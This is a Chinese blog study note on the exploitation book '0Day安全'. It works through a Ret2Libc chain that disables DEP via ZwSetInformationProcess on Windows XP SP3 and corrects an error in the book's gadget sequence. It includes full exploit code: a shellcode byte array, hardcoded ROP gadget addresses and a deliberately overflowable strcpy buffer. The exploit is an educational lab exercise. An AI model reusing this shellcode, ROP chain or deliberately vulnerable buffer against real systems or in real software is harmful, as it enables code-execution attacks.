记录学习《0Day安全》路上遇到的问题解决方案 利用Ret2Libc挑战DEP

最新推荐文章于 2024-05-21 16:28:23 发布
最新推荐文章于 2024-05-21 16:28:23 发布
阅读量787 收藏
点赞数 2
分类专栏: 0day安全学习 文章标签: 解决方案 安全 0-day
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z_lit0/article/details/71156519
版权 
if  __author__ == "LiT0":

0x00 前言

在此节中,首次碰到书本上的错误(大神勿喷,请看完全文。按照我的思路执行成功)
具体在12.3.1节 关于利用ZwSetInformationProcess 的实践实验。实验了一晚上,按照书上一步步来总是出错。经过认真研究发现了一处错误。

系统环境与书上一致 xp sp3 && vc++ 没有gs 和 safeseh

0x01 正文

先过趁热过一遍实验:

首先,经典溢出漏洞without GS—> 直接覆盖函数返回地址—> 找到关闭DEP函数的入口地址—>执行关闭DEP—>回跳执行shellcode
根据流程通过执行

mov eax, 1
retn

step1
进入关闭函数,但是函数在执行过程中写入esp, 而esp在溢出时就被破坏,所以需要修正esp
可以通过

push esp
pop ebp
retn 4

至此,可以成功关闭dep 但是,此时因为函数体里面的代码,破坏了栈,我们失去了程序的控制权。

此前程序按照预想的进行

进行下一步骤: 书上内容所说,使用

pop eax 
retn 28

利用此段代码扩充ebp 和 esp 之间的空间, 使dep关闭函数的压栈行为就不会破坏栈了。

然而,我单步调试执行之后发现执行 pop eax 之后, 会将 dep关闭函数入口地址 出栈,使esp下移,那么retn 返回之后进入的就是错误的地址 如下所示

执行 pop 前:

这里写图片描述

esp 在0x0012fec0

执行pop之后:

这里写图片描述

esp已经+4

那么下一步就会访问 0xFFFF33E9!!

这里写图片描述

0x02解决方案

明白了问题的成因,问题也就迎刃而解。

很明显,只要去掉pop就可以使程序正常返回至关闭DEP函数入口地址

找一个不带pop的 retn 28!

使用插件 pop 设为0 n设为 28 就可以找到了!

这里写图片描述

修改代码如下:

// GS_Virtual.cpp : 定义控制台应用程序的入口点。
//

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>

char shellcode[]= 
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x52\xE2\x90\x7C"  //mov eax, 1    ret
"\x85\x8B\x0F\x5D"  //修正ebp push esp; pop ebp; retn
"\x21\xF7\x80\x7C"  //增大esp  retn 28; <-------------------修改此处,原为pop retn 28
"\x7B\x46\x86\x7C"  //jmp esp;
"\x24\xCD\x91\x7C"  //关dep
"\xE9\x33\xFF\xFF"  //back
"\xFF\x90\x90\x90" 
;

void test()
{
    char tt[176];
    strcpy(tt,shellcode);
}
int main()
{
    HINSTANCE hInst = LoadLibrary("shell32.dll");
    char temp[200];
    test();
    return 0;
}

成功执行

这里写图片描述

lit0
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ret2Libc 实战之利用 ZwSetInformationProcess.zip
06-11
使用ntdll库中原有的ZwSetInformationProcess代码关闭DEP
7.1 覆盖虚函数突破GS
qq_55202378的博客
10-10 590
GS 溢出
什么是0day攻击?什么是Nday漏洞?
logic1001的博客
10-12 770
0day和Nday漏洞的区别是什么?
0day 第10章--10.3:覆盖虚函数突破GS
I have a dream
11-01 431
实验环境:winxp sp3 vs2010 实验要求:程序要求禁用优化、release版本 实验原理:程序只有在函数返回时才检查Security Cookie,如果在函数检查之前劫持程序流程,就能实现缓冲区溢出了!因此可以利用C++中的虚函数!(为什么?见0day第6章攻击C++虚函数) [C++虚函数原理] {虚表指针-&amp;gt;虚表-&amp;gt;函数地址,call函数地址} 总结一下入的坑: (1)...
还原0day----覆盖虚函数突破GS
笔记本
05-12 437
接上一篇,与vc++6.0(并没有GS安全机制)不一样的是,vs2008启用GS后的实例内存布局有些不一样,结合0day代码探究下突破GS的具体细节 C++代码:vs2008 release 优化禁用 #include "stdafx.h" #include "string.h" class GSVirtual { public : void gsv(char * src) ...
0day安全》——栈中的守护天使:GS
sunr_的博客
08-26 322
GS安全编译选项 原理 在栈帧中压入一个随机DWORD,IDA称之为“security cookie”,位于EBP之前。系统在.data区块中存放一个security cookie的副本。当栈发生溢出是,security cookie将被覆盖,之后才是EBP和返回地址。函数返回之前比对两者的值,如果改变则说明security cookie已被破坏,发生了溢出。 例外 额外的数据和操作带来的直接后果就是系统性能的下降,为了将对性能的影响降到最小,编译器在编译程序的时候并不是对所有的函数都应用 GS,以下情况
ret2libc2pwn 入门题
02-11
pwn 入门题
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2libc1pwn 入门题
02-11
pwn 入门题
覆盖虚函数突破GS (踩坑)
weixin_30485291的博客
03-08 269
环境: xp sp3 vs 2008 参考文章: https://bbs.pediy.com/thread-211315.htm https://www.52pojie.cn/thread-490768-1-1.html 《0day安全软件漏洞分析技术》 10.3 节 代码: #include "stdafx.h" #include "string.h" class GSVirtual { pu...
0day安全》——数据与程序的分水岭:DEP
sunr_的博客
08-31 467
DEP机制的保护原理 溢出攻击的根源在于区分不了代码与数据。 DEP 的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入 shellcode 时,程序会尝试在数据页面上执行指令,此时 CPU 就会抛出异常,而不是去执行恶意指令。 DEP 的主要作用是阻止数据页(如默认的堆页、各种堆栈页以及内存池页)执行代码。微软从 Windows XP SP2 开始提供这种技术支持,根据实现的机制不同可分为:软件 DEP( Software DEP)和硬件 DEP( Hardware-enforced DEP
0day安全》堆操作
sunr_的博客
08-25 243
0day2》堆操作 堆的调试 #include "stdafx.h" #include <windows.h> int main() { HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); __asm int 3 h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,3); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,5); h3 = Heap
ret2lib bypass dep 学习笔记(0day2Edition NtSetInformationProcess)
Catch me if you can
04-21 2328
DEP绕过ROP(ret2lib)技术总结样本空间测试环境 操作系统:windows xp sp3 工具:immunity debugger 样本源码: #include <stdio.h> #include <string.h> #include <windows.h> char shellcode[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x
0Day》之通过覆盖虚表指针来突破GS
binghupo的博客
12-05 1041
对于栈溢出,微软做了GS防护,就是在函数栈帧初始化之后,生成一个随机的cookie,将其保存在EBP之前,同时在.data中也保存一份,在函数返回之前,先检测栈中cookie的值,如果我们还用之前栈溢出的方式,通过shellcode覆盖函数返回地址来达到溢出的目的,这时必然会覆盖掉栈中的cookie,这样的溢出就会被检测到,也就无法达到溢出的目的。但是正所谓你有张良计,我有过墙梯,GS的检测要在函
0day 第12章--12.4节:利用可执行内存挑战DEP
I have a dream
04-07 336
实验环境: winxp sp3 vs2010 实验配置: 关闭DEP、GS、SAFESEH,禁用优化,release版本 思路: 如果进程的内存空间中有一段可读可写可执行的内存,而我们将shellcode复制到该内存,并劫持程序流程,则我们的shellcode就有执行的机会。 具体实施: 利用memcpy函数将shellcode复制到该段内存。 memcpy函数的部署可参考上一节 1、首先找到一段...
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 651
作用就是定义属性之间的数学关系
Nginx - 安全基线配置与操作指南
小工匠
05-19 914
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器的安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
最新发布
rolt的专栏
05-21 663
然后再针对这个画一个块内部图,然后这里再把签名拖上去
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值